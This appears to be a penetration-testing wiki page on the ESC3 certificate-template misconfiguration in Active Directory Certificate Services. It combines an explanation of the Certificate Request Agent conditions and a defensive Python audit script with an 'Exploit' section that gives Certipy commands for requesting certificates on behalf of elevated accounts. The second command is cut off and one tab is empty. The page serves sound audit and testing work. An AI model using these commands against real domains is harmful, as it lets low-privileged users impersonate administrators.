# ESC3

> **TL;DR**
>
> ESC3 allows you to request a certificate that can then be used to request a second certificate on behalf of any user; that second certificate can be used for client authentication with Kerberos.

A template is vulnerable to ESC3 when it defines the Certificate Request Agent EKU, which allows its holder to request certificates from other templates on behalf of other principals.

A certificate template with the following configuration is vulnerable to ESC3:

* The Enterprise CA grants enrollment rights to low-privileged users.
* Manager approval is disabled.
* No authorized signatures are required.
* An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.
* The certificate template defines the Certificate Request Agent EKU.
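
To audit for the template-level conditions listed above, the following added example (not part of the original page or of Certipy) evaluates template attributes as they would be exported from Active Directory. The attribute names, the `CT_FLAG_PEND_ALL_REQUESTS` bit and the Certificate Request Agent OID are the real schema values; the `enroll_sids` field (SIDs already resolved from the template's security descriptor) and the sample records are constructed assumptions. Enrollment rights on the Enterprise CA itself must be checked separately.

```python
# Added example: audit exported certificate template records for ESC3 conditions.
CERT_REQUEST_AGENT_OID = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent EKU
CT_FLAG_PEND_ALL_REQUESTS = 0x2   # msPKI-Enrollment-Flag bit: manager approval required
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}            # Domain Users, Domain Computers


def is_low_priv(sid):
    """True for well-known SIDs/RIDs that cover ordinary domain principals."""
    if sid in LOW_PRIV_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in LOW_PRIV_RIDS


def esc3_findings(template):
    """Return which of the four template-level ESC3 conditions are met."""
    findings = []
    ekus = set(template.get("pKIExtendedKeyUsage", [])) | set(
        template.get("msPKI-Certificate-Application-Policy", []))
    if CERT_REQUEST_AGENT_OID in ekus:
        findings.append("request-agent-eku")
    if not int(template.get("msPKI-Enrollment-Flag", 0)) & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no-manager-approval")
    if int(template.get("msPKI-RA-Signature", 0)) == 0:
        findings.append("no-authorized-signatures")
    # enroll_sids is a hypothetical field: SIDs holding Enroll rights on the template
    if any(is_low_priv(s) for s in template.get("enroll_sids", [])):
        findings.append("low-priv-enroll")
    return findings


def audit(templates):
    """Names of templates that meet all four conditions."""
    return [t["cn"] for t in templates if len(esc3_findings(t)) == 4]


# Constructed sample records (domain SID and template names are made up).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_TEMPLATES = [
    {"cn": "AgentOpen", "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_OID],
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "enroll_sids": [DOMAIN + "-513"]},
    {"cn": "AgentApproved", "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_OID],
     "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
     "enroll_sids": ["S-1-5-11"]},
    {"cn": "AgentAdminsOnly", "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_OID],
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "enroll_sids": [DOMAIN + "-512"]},
]

if __name__ == "__main__":
    print(audit(SAMPLE_TEMPLATES))
```

A template that defines the EKU but requires manager approval, authorized signatures, or restricts enrollment to privileged groups is reported with fewer than four findings, which shows which control is currently preventing abuse.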

## Exploit

{% tabs %}
{% tab title="Certipy.py" %}
{% embed url="https://github.com/ly4k/Certipy#esc1" %}

{% code title="Linux (Attacker)" %}

```fish
# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]

# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -u
```

{% endcode %}

{% endtab %}

{% tab title="Certify.exe" %}

{% endtab %}
{% endtabs %}
